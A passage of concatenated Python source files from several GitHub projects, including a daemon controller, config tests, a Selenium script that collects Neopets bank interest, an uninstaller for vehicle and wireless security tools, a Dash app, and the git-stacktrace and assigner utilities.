:attr:`Controller.STATE_ACTIVE` - :attr:`Controller.STATE_IDLE` - :attr:`Controller.STATE_SLEEPING` - :attr:`Controller.STATE_STOP_REQUESTED` - :attr:`Controller.STATE_STOPPING` - :attr:`Controller.STATE_STOPPED` :param int state: The runtime state :raises: ValueError """ if state == self._state: return elif state not in self._STATES.keys(): raise ValueError('Invalid state {}'.format(state)) # Check for invalid transitions if self.is_waiting_to_stop and state not in [self.STATE_STOPPING, self.STATE_STOPPED]: LOGGER.warning('Attempt to set invalid state while waiting to ' 'shutdown: %s ', self._STATES[state]) return elif self.is_stopping and state != self.STATE_STOPPED: LOGGER.warning('Attempt to set invalid post shutdown state: %s', self._STATES[state]) return elif self.is_running and state not in [self.STATE_ACTIVE, self.STATE_IDLE, self.STATE_SLEEPING, self.STATE_STOP_REQUESTED, self.STATE_STOPPING]: LOGGER.warning('Attempt to set invalid post running state: %s', self._STATES[state]) return elif self.is_sleeping and state not in [self.STATE_ACTIVE, self.STATE_IDLE, self.STATE_STOP_REQUESTED, self.STATE_STOPPING]: LOGGER.warning('Attempt to set invalid post sleeping state: %s', self._STATES[state]) return LOGGER.debug('State changed from %s to %s', self._STATES[self._state], self._STATES[state]) self._state = state def setup(self): """Override to provide any required setup steps.""" LOGGER.debug('%s.setup() NotImplemented', self.__class__.__name__) def shutdown(self): """Override to provide any required shutdown steps.""" LOGGER.debug('%s.shutdown() NotImplemented', self.__class__.__name__) def stop(self): """Override to implement shutdown steps.""" LOGGER.info('Attempting to stop the process') self.set_state(self.STATE_STOP_REQUESTED) # Call shutdown for classes to add shutdown steps self.shutdown() # Wait for the current run to finish while self.is_running and self.is_waiting_to_stop: LOGGER.info('Waiting for the process to finish') time.sleep(self.SLEEP_UNIT) # Change the state to shutting down if not self.is_stopping: self.set_state(self.STATE_STOPPING) # Call a method that may be overwritten to cleanly shutdown self.on_shutdown() # Change our state self.set_state(self.STATE_STOPPED) @property def system_platform(self): """Return a tuple containing the operating system, python implementation (CPython, pypy, etc), and python version. :rtype: tuple(str, str, str) """ return (self.operating_system, platform.python_implementation(), platform.python_version()) @property def wake_interval(self): """Property method that returns the wake interval in seconds. :rtype: int """ return (self.config.application.get('wake_interval') or self.WAKE_INTERVAL) def _on_signal(self, signum, _frame): """Append the signal to the queue, to be processed by the main.""" self.pending_signals.put(signum) ``` #### File: helper/tests/config_tests.py ```python import json import os import unittest import uuid import boto3 from helper import config class ConfigDefaultTests(unittest.TestCase): def setUp(self): self.config = config.Config() def test_application(self): self.assertDictEqual(self.config.application, config.APPLICATION) def test_daemon(self): self.assertDictEqual(self.config.daemon, config.DAEMON) def test_logging(self): self.assertDictEqual(self.config.logging, config.LOGGING) class RemoteConfigTests(unittest.TestCase): def setUp(self): self.value = { 'Application': { 'key': str(uuid.uuid4()) }, 'Daemon': { 'user': str(uuid.uuid4()), 'group': str(uuid.uuid4()) }, 'Logging': { 'disable_existing_loggers': False, 'incremental': True} } self.bucket = str(uuid.uuid4()) client = boto3.client('s3', endpoint_url=os.environ['S3_ENDPOINT']) client.create_bucket(Bucket=self.bucket) client.put_object( Bucket=self.bucket, Key='test.json', Body=json.dumps(self.value), ACL='public-read') def test_loaded_config(self): cfg = config.Config('{}/{}/test.json'.format( os.environ['S3_ENDPOINT'], self.bucket)) for key in self.value['Application'].keys(): self.assertEqual(cfg.application[key], self.value['Application'][key]) for key in self.value['Daemon'].keys(): self.assertEqual(cfg.daemon[key], self.value['Daemon'][key]) for key in self.value['Logging'].keys(): self.assertEqual(cfg.logging[key], self.value['Logging'][key]) def test_value_error_raised_for_missing_file(self): with self.assertRaises(ValueError): config.Config('{}/{}/{}.json'.format(os.environ['S3_ENDPOINT'], self.bucket, uuid.uuid4())) class S3ConfigTests(RemoteConfigTests): def test_loaded_config(self): cfg = config.Config('s3://{}/test.json'.format(self.bucket)) for key in self.value['Application'].keys(): self.assertEqual(cfg.application[key], self.value['Application'][key]) for key in self.value['Daemon'].keys(): self.assertEqual(cfg.daemon[key], self.value['Daemon'][key]) for key in self.value['Logging'].keys(): self.assertEqual(cfg.logging[key], self.value['Logging'][key]) def test_value_error_raised_for_missing_file(self): with self.assertRaises(ValueError): config.Config('s3://{}/{}.json'.format(self.bucket, uuid.uuid4())) ```
{ "source": "joshehlinger/neobanker", "score": 3 }
#### File: joshehlinger/neobanker/banker.py ```python import time import sys import argparse import datetime from selenium import webdriver def collect_interest(config): options = webdriver.ChromeOptions() options.add_argument('headless') driver = webdriver.Chrome(options=options) try: print ('Run starting at {}'.format(str(datetime.datetime.now()))) driver.get('http://www.neopets.com/bank.phtml') # Login print('Logging in...') login_form = driver.find_element_by_class_name('welcomeLoginContent') username_login = login_form.find_element_by_name('username') password_login = login_form.find_element_by_name('password') username_login.clear() username_login.send_keys(config.username) password_login.clear() password_login.send_keys(config.password) login_button = driver.find_element_by_class_name('welcomeLoginButton') login_button.click() print('Login successful') # Collect interest interest_button = driver.find_element_by_css_selector("input[value^='Collect Interest']") driver.execute_script("arguments[0].scrollIntoView();", interest_button) interest_button.click() print('Collected Interest!') time.sleep(1) driver.quit() return 0 except Exception as e: print(e) driver.quit() return 1 def arg_parser() -> argparse.ArgumentParser: desc = 'Collect that interest' parser = argparse.ArgumentParser(description=desc) parser.add_argument('--username', dest='username', metavar='', help='username') parser.add_argument('--password', dest='password', metavar='', help='password') return parser def main(args=None): parser = arg_parser() config = parser.parse_args(args=args) if config.username is None or config.password is None: print('Username and Password are required!') return 1 return collect_interest(config) if __name__ == '__main__': sys.exit(main()) ```
{ "source": "joshem/Autopen2", "score": 3 }
#### File: old/testkivy/main.py ```python import kivy kivy.require('1.9.0') from cheesepoofs.kerplunk import script from kivy.app import App from kivy.uix.boxlayout import BoxLayout from kivy.uix.label import Label from kivy.uix.button import Button from kivy.lang import Builder from kivy.animation import Animation from kivy.uix.floatlayout import FloatLayout from kivy.uix.image import Image from kivy.uix.textinput import TextInput from kivy.graphics import Color, Rectangle Builder.load_string(''' <Marvel> Label: id: loki text: 'loki: I AM YOUR GOD!' Button: id: hulk text: "press to smash loki" on_release: root.hulk_smash() ''') class Marvel(BoxLayout): def hulk_smash(self): self.ids.hulk.text = "hulk: puny god!" self.ids["loki"].text = "loki: >_<!!!" # alternative syntax script.install_script() class AutoPen(App): def build(self): #with open("tips.txt", "r") as stream: # labeltext = stream.read() label = Label(text="[size=50]hi[/size]", markup=True) box = BoxLayout() marvell = Marvel() box.add_widget(marvell) box.add_widget(label) return box class Anima(App): def build(self): floater = FloatLayout() self.widget = Button(text='herpderp', pos = (200,200), size_hint=(0.2,0.2)) self.backbutton = Button(text='back', pos=(0,0), size_hint =(0.1,0.2)) self.widget.bind(on_press=self.animate) self.backbutton.bind(on_press=self.back) floater.add_widget(self.widget) floater.add_widget(self.backbutton) return floater def animate(self, widgetself): anim = Animation(x=100, y=100) anim.start(self.widget) def back(self,widgetself): anim = Animation(x=200,y=200) anim.start(self.widget) class Loading(App): def build(self): floater = FloatLayout() logo = Image(source='AutoPen.png', pos_hint={'center_x': 0.5, 'center_y': .6}) spiderman = Label( text='[size=24][i]With Great Power comes Great Responsibility[/i][/size]', markup=True, pos_hint={'center_x': 0.5, 'center_y': .2}) enter = Button(text='enter', size_hint=(0.2,0.1), pos_hint={'center_x': 0.5, 'center_y': .1}) floater.add_widget(logo) floater.add_widget(spiderman) floater.add_widget(enter) return floater class Textboox(App): def build(self): floater = FloatLayout() if __name__ == "__main__": Loading().run() ``` #### File: joshem/Autopen2/uninstall.py ```python import general_use import dependencies import tools import subprocess import os def uninstall(toolname): repo_canbus_utils = 'https://github.com/digitalbond/canbus-utils.git' repo_kayak = 'https://github.com/dschanoeh/Kayak.git' repo_caringcaribou = 'https://github.com/CaringCaribou/caringcaribou.git' #want to check this to make sure it works, instructions a bit unclear repo_c0f = 'https://github.com/zombieCraig/c0f.git' repo_udsim = 'https://github.com/zombieCraig/UDSim.git' repo_j1939 = 'https://github.com/wang701/can-utils-j1939.git' repo_canbadger = 'https://github.com/Gutenshit/CANBadger.git' repo_canbadger_server = 'https://github.com/Gutenshit/CANBadger-Server.git' repo_katoolin = 'https://github.com/LionSec/katoolin.git' repo_bluelog = 'https://github.com/MS3FGX/Bluelog.git' repo_bluemaho = 'https://github.com/zenware/bluemaho.git' link_pyobd = 'http://www.obdtester.com/download/pyobd_0.9.3.tar.gz' #this might not work link_o2oo = 'https://www.vanheusden.com/O2OO/O2OO-0.9.tgz' link_romraider = 'http://assembla.com/spaces/romraider/documents/a5Ao9gHEir5P9Udmr6QqzO/download/RomRaider0.5.9RC3-linux.jar' d = general_use.check_distribution() pack_man = general_use.package_tool(d) rm_rc = -1 #check path to make sure it's in the autopen directory curr = os.getcwd() back_index = curr.rfind('/') ap_index = curr.find('autopen') if curr[back_index:] != '/autopen': path = curr[:ap_index+7] else: path = curr os.chdir(path) try: if toolname == 'canbus-utils': rm_rc = subprocess.run(['rm', '-rf', 'canbus-utils']).returncode elif toolname == 'Kayak': rm_rc = subprocess.run(['rm', '-rf', 'Kayak']).returncode elif toolname == 'caringcaribou': rm_rc = subprocess.run(['rm', '-rf', 'caringcaribou']).returncode elif toolname == 'c0f': rm_rc = subprocess.run(['rm', '-rf', 'c0f']).returncode elif toolname == 'udsim': rm_rc = subprocess.run(['rm', '-rf', 'UDSim']).returncode elif toolname == 'katoolin': rm_rc = subprocess.run(['rm', '-rf', 'katoolin']).returncode elif toolname == 'bluelog': rm_rc = subprocess.run(['rm', '-rf', 'Bluelog']).returncode elif toolname == 'bluemaho': rm_rc = subprocess.run(['rm', '-rf', 'bluemaho']).returncode elif toolname == 'j1939': rm_rc = subprocess.run(['rm', '-rf', 'can-utils-j1939']).returncode elif toolname == 'canbadger-hw': rm_rc = subprocess.run(['rm', '-rf', 'CANBadger']).returncode #https://github.com/Gutenshit/CANBadger/wiki/Getting-the-board-ready elif toolname == 'canbadger-sw': rm_rc = subprocess.run(['rm', '-rf', 'CANBadger-Server']).returncode elif toolname == 'pyobd': try: rm_rc = subprocess.run(['rm', '-rf','pyobd_0.9.3.tar.gz']).returncode except: pass try: rm_rc = subprocess.run('rm', '-rf', 'pyobd-0.9.3').returncode except: pass elif toolname == 'o2oo': try: rm_rc = subprocess.run(['rm', '-rf','O2OO-0.9.tgz']).returncode except: pass try: rm_rc = subprocess.run('rm', '-rf', 'O2OO-0.9').returncode except: pass elif toolname == 'btscanner': rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','btscanner']).returncode elif toolname == 'gnuradio': rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'gnuradio']).returncode elif toolname == 'aircrack-ng': rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'aircrack-ng']).returncode elif toolname == 'gqrx': rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','gqrx']).returncode elif toolname == 'can-utils': rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'can-utils']).returncode elif toolname == 'wireshark': rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'wireshark']).returncode elif toolname == 'tshark': rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'tshark']).returncode except: print ('Not in correct directory') print ('current directory is: ', os.getcwd()) pass if rm_rc == 0: #remove the tool from the text file f = open("installed.txt","r+") d = f.readlines() f.seek(0) for i in d: if i != toolname: f.write(i) f.truncate() print ('UNINSTALL SUCCESSFUL: Successfully uninstalled', toolname) return rm_rc def test(name): return 0 ```
{ "source": "joshembree/ml-viz", "score": 3 }
#### File: joshembree/ml-viz/app.py ```python import dash import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.graph_objs as go import plotly.express as px from plotly.subplots import make_subplots import pandas as pd import numpy as np import example_figures as example import roc_fig figs = { 'ROC Curves': roc_fig.fig, 'Example Scatter': example.scatter, 'Example Histogram': example.histogram } app = dash.Dash() #fig_names = ['scatter', 'histogram'] fig_names = list(figs.keys()) fig_dropdown = html.Div([ dcc.Dropdown( id='fig_dropdown', options=[{'label': x, 'value': x} for x in fig_names], value=None )]) fig_plot = html.Div(id='fig_plot') app.layout = html.Div([fig_dropdown, fig_plot]) @app.callback( dash.dependencies.Output('fig_plot', 'children'), [dash.dependencies.Input('fig_dropdown', 'value')]) def update_output(fig_name): return name_to_figure(fig_name) def name_to_figure(fig_name): figure = go.Figure() for name in fig_names: if fig_name == name: figure = figs[name] return dcc.Graph(figure=figure) app.run_server(debug=True, use_reloader=False) ```
{ "source": "joshenders/git-stacktrace", "score": 2 }
#### File: git_stacktrace/tests/base.py ```python import fixtures import testtools class TestCase(testtools.TestCase): def setUp(self): super(TestCase, self).setUp() stdout = self.useFixture(fixtures.StringStream('stdout')).stream self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout)) stderr = self.useFixture(fixtures.StringStream('stderr')).stream self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr)) ``` #### File: git_stacktrace/tests/test_api.py ```python import mock from git_stacktrace.tests import base from git_stacktrace import api from git_stacktrace import git class TestApi(base.TestCase): @mock.patch('git_stacktrace.git.convert_since') def test_convert_since(self, mocked_command): expected = "HASH1..HASH2" mocked_command.return_value = expected self.assertEqual(expected, api.convert_since('1.day')) @mock.patch('git_stacktrace.git.valid_range') def test_valid_range(self, mocked_command): expected = True mocked_command.return_value = expected self.assertEqual(expected, api.valid_range('hash1..hash2')) expected = False mocked_command.return_value = expected self.assertEqual(expected, api.valid_range('hash1..hash2')) def get_traceback(self, java=False): if java: with open('git_stacktrace/tests/examples/java1.trace') as f: traceback = api.parse_trace(f.readlines()) else: with open('git_stacktrace/tests/examples/python3.trace') as f: traceback = api.parse_trace(f.readlines()) return traceback def setup_mocks(self, mock_files, mock_files_touched): mock_files_touched.return_value = {'hash2': [git.GitFile('common/utils/geo_utils.py', 'M')]} mock_files.return_value = ['common/utils/geo_utils.py'] @mock.patch('git_stacktrace.git.pickaxe') @mock.patch('git_stacktrace.git.files_touched') @mock.patch('git_stacktrace.git.files') @mock.patch('git_stacktrace.git.line_match') def test_lookup_stacktrace_python(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe): mock_files_touched.return_value = True mock_line_match.return_value = False traceback = self.get_traceback() self.setup_mocks(mock_files, mock_files_touched) self.assertEqual(0, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False). get_sorted_results()[0]._line_numbers_matched) self.assertEqual(3, mock_pickaxe.call_count) @mock.patch('git_stacktrace.git.pickaxe') @mock.patch('git_stacktrace.git.files_touched') @mock.patch('git_stacktrace.git.files') @mock.patch('git_stacktrace.git.line_match') def test_lookup_stacktrace_java(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe): mock_files_touched.return_value = True mock_line_match.return_value = True traceback = self.get_traceback(java=True) mock_files.return_value = ['devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java'] mock_files_touched.return_value = { 'hash2': [git.GitFile('devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java', 'M')]} self.assertEqual(2, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False). get_sorted_results()[0]._line_numbers_matched) self.assertEqual(0, mock_pickaxe.call_count) @mock.patch('git_stacktrace.git.pickaxe') @mock.patch('git_stacktrace.git.files_touched') @mock.patch('git_stacktrace.git.files') @mock.patch('git_stacktrace.git.line_match') def test_lookup_stacktrace_fast(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe): mock_files_touched.return_value = True traceback = self.get_traceback() self.setup_mocks(mock_files, mock_files_touched) api.lookup_stacktrace(traceback, "hash1..hash3", fast=True) self.assertEqual(1, mock_pickaxe.call_count) @mock.patch('git_stacktrace.git.pickaxe') @mock.patch('git_stacktrace.git.files_touched') @mock.patch('git_stacktrace.git.files') @mock.patch('git_stacktrace.git.line_match') def test_lookup_stacktrace_line_match(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe): mock_files_touched.return_value = True mock_line_match.return_value = True traceback = self.get_traceback() self.setup_mocks(mock_files, mock_files_touched) self.assertEqual(1, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False). get_sorted_results()[0]._line_numbers_matched) self.assertEqual(3, mock_pickaxe.call_count) ```
{ "source": "josherich/CSS2Code", "score": 2 }
#### File: CSS2Code/scripts/record.py ```python from selenium import webdriver import sys, getopt, time, subprocess, shlex from xvfbwrapper import Xvfb import argparse effects = ['bounce','flash', 'pulse', 'rubberBand', 'shake', 'headShake', 'swing', 'tada', 'wobble','jello', 'bounceIn','bounceInDown', 'bounceInLeft','bounceInRight', 'bounceInUp','bounceOut', 'bounceOutDown', 'bounceOutLeft', 'bounceOutRight','bounceOutUp', 'fadeIn','fadeInDown','fadeInDownBig', 'fadeInLeft', 'fadeInLeftBig', 'fadeInRight', 'fadeInRightBig','fadeInUp', 'fadeInUpBig', 'fadeOut', 'fadeOutDown', 'fadeOutDownBig', 'fadeOutLeft', 'fadeOutLeftBig','fadeOutRight','fadeOutRightBig', 'fadeOutUp', 'fadeOutUpBig','flipInX', 'flipInY', 'flipOutX','flipOutY','lightSpeedIn','lightSpeedOut', 'rotateIn','rotateInDownLeft','rotateInDownRight', 'rotateInUpLeft', 'rotateInUpRight', 'rotateOut', 'rotateOutDownLeft', 'rotateOutDownRight', 'rotateOutUpLeft', 'rotateOutUpRight','hinge', 'jackInTheBox', 'rollIn','rollOut', 'zoomIn','zoomInDown', 'zoomInLeft','zoomInRight', 'zoomInUp','zoomOut', 'zoomOutDown', 'zoomOutLeft', 'zoomOutRight','zoomOutUp', 'slideInDown', 'slideInLeft', 'slideInRight','slideInUp', 'slideOutDown','slideOutLeft','slideOutRight', 'slideOutUp', 'heartBeat'] patterns = [ 'text', 'square', 'line', 'image' ] speeds = [ 'slow', 'slower', 'fast', 'faster' ] def record(xvfb, browser, effect, pattern, speed, html_path, video_path): url = 'file://%s/%s_%s_%s.html' % (html_path, effect, pattern, speed) destination = '%s/%s/%s_%s_%s.flv' % (video_path, effect, effect, pattern, speed) browser.get(url) # normal quality, lagging in the first part on the video. filesize ~7MB # ffmpeg_stream = 'ffmpeg -f x11grab -s 1280x720 -r 24 -i :%d+nomouse -c:v libx264 -preset superfast -pix_fmt yuv420p -s 1280x720 -threads 0 -f flv "%s"' % (xvfb.new_display, destination) # high quality, no lagging but huge. file size ~50MB # ffmpeg_stream = 'ffmpeg -y -r 30 -f x11grab -s 256x256 -i :%d+nomouse -c:v libx264 -pix_fmt yuv420p video/bounce_text.mp4' % xvfb.new_display # mkdir mkdir_cmd = 'mkdir %s/%s' % (video_path, effect) p = subprocess.Popen(shlex.split(mkdir_cmd)) # crop ffmpeg_stream = 'ffmpeg -y -f x11grab -s 256x512 -r 24 -t 5 -i :%d+nomouse -filter:v "crop=256:256:0:128" -c:v libx264 -preset superfast -pix_fmt yuv420p -f flv "%s"' % (xvfb.new_display, destination) args = shlex.split(ffmpeg_stream) p = subprocess.Popen(args) time.sleep(6) # record for 6 secs def run(opt): print('Sreencast webpage animation') xvfb = Xvfb(width=256, height=512, colordepth=24) xvfb.start() browser = webdriver.Chrome() for effect in effects: for pattern in patterns: for speed in speeds: record(xvfb, browser, effect, pattern, speed, opt.html_path, opt.video_path) browser.quit() xvfb.stop() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( '--video-path', default='./data/video', type=str, help='Root directory path of video generated') parser.add_argument( '--html-path', default='./data/html', type=str, help='Root directory path of html generated') args = parser.parse_args() run(args) ```
{ "source": "joshes/ocp", "score": 2 }
#### File: ocpmodels/datasets/single_point_lmdb.py ```python import os import pickle import lmdb from torch.utils.data import Dataset from ocpmodels.common.registry import registry @registry.register_dataset("single_point_lmdb") class SinglePointLmdbDataset(Dataset): r"""Dataset class to load from LMDB files containing single point computations. Useful for Initial Structure to Relaxed Energy (IS2RE) task. Args: config (dict): Dataset configuration transform (callable, optional): Data transform function. (default: :obj:`None`) """ def __init__(self, config, transform=None): super(SinglePointLmdbDataset, self).__init__() self.config = config self.db_path = self.config["src"] assert os.path.isfile(self.db_path), "{} not found".format( self.db_path ) env = self.connect_db(self.db_path) self._keys = [ f"{j}".encode("ascii") for j in range(env.stat()["entries"]) ] self.transform = transform env.close() def __len__(self): return len(self._keys) def __getitem__(self, idx): # Return features. env = self.connect_db(self.db_path) datapoint_pickled = env.begin().get(self._keys[idx]) data_object = pickle.loads(datapoint_pickled) data_object = ( data_object if self.transform is None else self.transform(data_object) ) env.close() return data_object def connect_db(self, lmdb_path=None): env = lmdb.open( lmdb_path, subdir=False, readonly=True, lock=False, readahead=False, map_size=1099511627776 * 2, ) return env ```
{ "source": "joshessman/assigner", "score": 3 }
#### File: assigner/commands/init.py ```python import logging import datetime from assigner.config import requires_config from assigner.backends.gitlab import GitlabRepo help = "Interactively initialize a new configuration" logger = logging.getLogger(__name__) def prompt(explanation, default=None): prompt_string = "" if default is not None: prompt_string = "{} (default: {}): ".format(explanation, default) else: prompt_string = "{}: ".format(explanation) value = input(prompt_string) if value == "": if default is not None: return default return prompt(explanation, default) return value def guess_semester(): now = datetime.datetime.now() if now.month < 5: semester = "SP" elif now.month < 8: semester = "SS" else: semester = "FS" return "{}-{}".format(now.year, semester) @requires_config def init(conf, _): conf["version"] = 3 conf["backend"] = {"name": "gitlab"} conf["backend"]["host"] = "https://{}".format( prompt("Gitlab server to use", "gitlab.com") ) conf["backend"]["token"] = prompt( "Gitlab access token (from {}/profile/personal_access_tokens)".format( conf["backend"]["host"] ) ) conf["semester"] = prompt( "Year and semester, in the format YYYY-(FS|SP|SS)", guess_semester() ) conf["namespace"] = prompt( "Gitlab group to create repositories under", "{}-CS1001".format(conf["semester"]), ) do_create_group = input("Do you want to create this group on Gitlab? [y/N]: ") if do_create_group.lower() == "y": GitlabRepo.create_group(conf["namespace"], conf["backend"]) print("{} created!".format(conf["namespace"])) do_canvas = input("Do you want to configure Canvas integration? [y/N]: ") if do_canvas.lower() == "y": conf["canvas-host"] = prompt("Canvas server to use (???.instructure.com)") conf["canvas-token"] = prompt( "Canvas access token (from {}/profile/settings)".format(conf["canvas-host"]) ) print("Congratulations, you're ready to go!") def setup_parser(parser): parser.set_defaults(run=init) ``` #### File: assigner/commands/lock.py ```python import logging from assigner import manage_repos from assigner.backends.exceptions import ( UserInAssignerGroup, UserNotAssigned, ) help = "Lock students out of repos" logger = logging.getLogger(__name__) def lock(args): """Sets each student to Reporter status on their homework repository so they cannot push changes, etc. """ #pylint: disable=no-value-for-parameter return manage_repos(args, _lock) def _lock(repo, student): try: repo.lock(student["id"]) return True except UserInAssignerGroup: logging.info("%s cannot be locked out because they are a member of the group, skipping...", student["username"]) return False except UserNotAssigned: logging.info("%s has not been assigned for %s", repo.name, student["username"]) return False def setup_parser(parser): parser.add_argument("name", help="Name of the assignment to lock.") parser.add_argument("--section", nargs="?", help="Section to lock") parser.add_argument("--student", metavar="id", help="ID of student whose assignment needs locking.") parser.add_argument("--dry-run", action="store_true", help="Don't actually do it.") parser.set_defaults(run=lock) ``` #### File: assigner/commands/set.py ```python import logging from assigner.config import requires_config help = "Set configuration values" logger = logging.getLogger(__name__) @requires_config def set_conf(conf, args): """Sets <key> to <value> in the config. """ conf[args.key] = args.value def setup_parser(parser): parser.add_argument("key", help="Key to set") parser.add_argument("value", help="Value to set") parser.set_defaults(run=set_conf) ``` #### File: assigner/commands/unarchive.py ```python import logging from assigner import manage_repos help = "Unarchive repos" logger = logging.getLogger(__name__) def unarchive(args): """Unarchive each student repository so it will show back up in the project list. """ #pylint: disable=no-value-for-parameter return manage_repos(args, lambda repo, _: repo.unarchive()) def setup_parser(parser): parser.add_argument("name", help="Name of the assignment to unarchive.") parser.add_argument("--section", nargs="?", help="Section to unarchive") parser.add_argument("--student", metavar="id", help="ID of student whose assignment to unarchive.") parser.add_argument("--dry-run", action="store_true", help="Don't actually do it.") parser.set_defaults(run=unarchive) ``` #### File: assigner/commands/unprotect.py ```python import logging from assigner import manage_repos help = "Unprotect a repo branch" logger = logging.getLogger(__name__) def unprotect(args): """Unprotect a branch in each student's repository so they can force push to it.""" for branch in args.branch: logging.info("Unprotecting %s...", branch) #pylint: disable=no-value-for-parameter, cell-var-from-loop manage_repos(args, lambda repo, _: repo.unprotect(branch)) def setup_parser(parser): parser.add_argument("name", help="Name of the assignment to unprotect.") parser.add_argument("--branch", "--branches", nargs="+", default=["master"], help="Branch to unprotect.") parser.add_argument("--section", nargs="?", help="Section to unprotect") parser.add_argument("--student", metavar="id", help="ID of student whose assignment to unprotect.") parser.add_argument("--dry-run", action="store_true", help="Don't actually do it.") parser.set_defaults(run=unprotect) ``` #### File: assigner/config/versions.py ```python import jsonschema import logging from assigner.config.schemas import SCHEMAS from assigner.config.upgrades import UPGRADES logger = logging.getLogger(__name__) class ValidationError(jsonschema.ValidationError): pass class VersionError(Exception): pass class UpgradeError(Exception): pass def validate(config, version=None): if version is None: version = get_version(config) if version >= len(SCHEMAS): raise VersionError( "Configuration version %d is newer than latest known configuration version %d" % (version, len(SCHEMAS) - 1) ) try: jsonschema.validate(config, SCHEMAS[version]) except jsonschema.ValidationError as e: raise ValidationError(e) def get_version(config): if "version" not in config: # Pre-version tracking if "token" in config: return 0 return 1 return config["version"] def upgrade(config): current = get_version(config) latest = len(SCHEMAS) - 1 if current > latest: return config if current != latest: logger.info("Migrating configuration from version %d to version %d.", current, latest) # Determine whether we should look for upgrade-caused # validation errors. If the initial config doesn't validate, # we can't tell whether upgrading has made things worse, but # we'll try anyway. try: validate(config, current) is_valid = True except ValidationError: is_valid = False for version in range(current, latest): config = UPGRADES[version](config) # Upgrade validation. # Upgrades should be rare, so we can afford to be very particular about them. assert get_version(config) == version + 1 if is_valid: try: validate(config, version + 1) except ValidationError as e: # pylint: disable=bad-continuation raise UpgradeError( """ Upgrading configuration from version %d to %d resulted in an invalid configuration: %s This is a bug. Please file an issue at https://github.com/redkyn/assigner/issues with your configuration. Your original configuration has been restored. """ % (version, version + 1, e.message) ) return config ``` #### File: assigner/assigner/progress.py ```python import enlighten # prevent name shadowing __enumerate = enumerate def iterate(iterable): return Progress(iterable) def enumerate(iterable): return __enumerate(iterate(iterable)) class Progress: def __init__(self, iterable): try: total = len(iterable) except (TypeError, AttributeError): total = None self.iterable = iterable self.manager = enlighten.get_manager() self.pbar = self.manager.counter(total=total) def __iter__(self): for item in self.iterable: yield item self.pbar.update() self.manager.stop() ``` #### File: assigner/assigner/roster_util.py ```python from assigner.backends.base import RepoError from assigner.config import DuplicateUserError import logging logger = logging.getLogger(__name__) def get_filtered_roster(roster, section, target): if target: roster = [s for s in roster if s["username"] == target] elif section: roster = [s for s in roster if s["section"] == section] if not roster: raise ValueError("No matching students found in roster.") return roster def add_to_roster( conf, backend, roster, name, username, section, force=False, canvas_id=None ): student = { "name": name, "username": username, "section": section, } logger.debug("%s", roster) if not force and any(filter(lambda s: s["username"] == username, roster)): raise DuplicateUserError("Student already exists in roster!") try: student["id"] = backend.repo.get_user_id(username, conf.backend) except RepoError: logger.warning("Student %s does not have a Gitlab account.", name) if canvas_id: student["canvas-id"] = canvas_id roster.append(student) ``` #### File: assigner/tests/assigner_test.py ```python import itertools from unittest.mock import patch from assigner import main, make_parser, subcommands from assigner.tests.utils import AssignerTestCase from git.cmd import GitCommandNotFound class MakeParserTestCase(AssignerTestCase): def setUp(self): self.mock_argparse = self._create_patch( "assigner.argparse", autospec=True ) self.mock_parser = self.mock_argparse.ArgumentParser.return_value self.mock_subparser = self.mock_parser.add_subparsers.return_value def test_creates_argument_parser(self): """ make_parser should create an ArgumentParser when called. """ make_parser() self.assertTrue(self.mock_argparse.ArgumentParser.called) def test_adds_all_subcommands(self): """ make_subparser should add all subcommands when called. """ make_parser() flattened_calls = list(itertools.chain(*itertools.chain( *self.mock_subparser.add_parser.call_args_list ))) for command in subcommands: self.assertIn(command, flattened_calls) def test_add_default_help(self): """ make_subparser should add a default to print usage when caled. """ make_parser() # NOTE: You can't compare lambdas made in different scopes self.assertTrue(self.mock_parser.set_defaults.called) self.assertFalse(self.mock_parser.print_usage.called) mock_args = self.mock_parser.parse_args.return_value mock_args.version = False _, kwargs = self.mock_parser.set_defaults.call_args kwargs['run'](mock_args) self.assertTrue(self.mock_parser.print_usage.called) class ExampleError(Exception): pass class MainTestCase(AssignerTestCase): def setUp(self): self.mock_configure = self._create_patch( "assigner.configure_logging", autospec=True ) self.mock_make_parser = self._create_patch( "assigner.make_parser", autospec=True ) self.mock_parser = self.mock_make_parser.return_value self.mock_args = self.mock_parser.parse_args.return_value self.mock_logging = self._create_patch( "assigner.logging", autospec=True ) def test_calls_make_parser(self): """ main calls parse_args on make_parser's returned parser. """ main([]) self.assertTrue(self.mock_parser.parse_args.called) def test_calls_args_run(self): """ main calls args.run with args. """ main([]) self.mock_args.run.assert_called_once_with(self.mock_args) def test_main_catches_exceptions(self): """ main should catch any exceptions and raise SystemExit. """ self.mock_args.tracebacks = False self.mock_args.run.side_effect = Exception with self.assertRaises(SystemExit): main([]) def test_main_raises_exceptions_with_traceback(self): """ main should raise exceptions if traceback is True. """ self.mock_args.tracebacks = True self.mock_args.run.side_effect = ExampleError with self.assertRaises(ExampleError): main([]) @patch("assigner.logger", autospec=True) def test_main_logs_exceptions(self, mock_logger): """ main should log exceptions when raised. """ self.mock_args.tracebacks = False self.mock_args.run.side_effect = ExampleError try: main([]) except SystemExit: pass mock_logger.error.assert_called_once_with(str(ExampleError())) @patch("assigner.logger", autospec=True) def test_main_logs_keyerror_with_catch(self, mock_logger): """ main should log a KeyError with "is missing" when raised. """ self.mock_args.tracebacks = False self.mock_args.run.side_effect = KeyError() try: main([]) except SystemExit: pass mock_logger.error.assert_called_once_with( "%s is missing", self.mock_args.run.side_effect ) @patch("assigner.logger", autospec=True) def test_main_logs_gitcommandnotfound_with_catch(self, 